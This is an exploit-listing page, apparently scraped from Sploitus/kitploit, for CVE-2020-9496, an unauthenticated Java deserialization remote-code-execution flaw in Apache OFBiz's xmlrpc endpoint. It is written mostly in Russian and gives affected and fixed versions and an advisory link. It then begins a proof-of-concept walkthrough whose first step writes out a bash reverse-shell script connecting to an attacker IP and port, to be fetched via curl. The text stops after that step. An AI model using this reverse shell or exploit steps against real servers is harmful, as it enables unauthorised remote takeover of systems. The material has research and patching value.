Sploitus

Exploit for CVE-2020-9496

kitploit · 2026-08-27

Exploit Code

MARKDOWN23 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-G33XTER-CVE-2020-9496
# CVE-2020-9496 - RCE

Поскольку два запроса, связанных с xmlrpc, в webtools (xmlrpc и ping) не используют аутентификацию, они уязвимы для небезопасной десериализации. Эта проблема была сообщена команде безопасности Альваро Муньосом some-email@example.com из команды GitHub Security Lab.

Эта уязвимость существует из-за проблем с сериализацией Java при обработке запросов, отправляемых на /webtools/control/xmlrpc. Удаленный неаутентифицированный злоумышленник может воспользоваться этой уязвимостью, отправив специально сформированный запрос. Успешная эксплуатация приводит к выполнению произвольного кода.

# Затронутая версия 17.12.01

# Исправленные версии 18.12.01, 17.12.04

Оригинальный блог: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

Для работы этого POC нам нужно разместить shell-скрипт и выполнить/получить доступ к этому файлу через curl.

### ШАГ 1: Создайте shell-файл с помощью однострочной команды Bash с вашим IP-адресом и портом.

root@kitploit:~
    
    
    $ cat shell.sh
    #!/bin/bash
    /bin/bash -i >& /dev/tcp/10.10.x.x/8001 0>&1